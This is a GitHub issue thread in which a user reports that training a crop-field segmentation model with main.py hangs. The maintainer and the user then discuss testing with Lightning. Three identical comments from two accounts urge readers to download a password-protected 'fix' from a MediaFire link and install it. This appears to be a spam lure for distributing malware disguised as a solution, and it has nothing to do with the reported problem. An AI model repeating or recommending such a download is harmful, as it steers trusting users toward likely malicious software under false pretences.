### ISSUE TITLE
I start training with main.py but stuck here

### ISSUE THREAD

**Issue by wuwuzhijing** [DarthReca/crop-field-segmentation-ukan#5]
![image](https://github.com/user-attachments/assets/8bba8515-5f84-4880-918d-fb0d4c277e39)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DarthReca** [comment]
I do not have any suggestions for this, I have too few context. I use Lightning for many projects but have never encountered this issue.

**Comment by wuwuzhijing** [comment]
> I do not have any suggestions for this, I have too few context. I use Lightning for many projects but have never encountered this issue.

OK. I'll test with Lightning later and show the result.
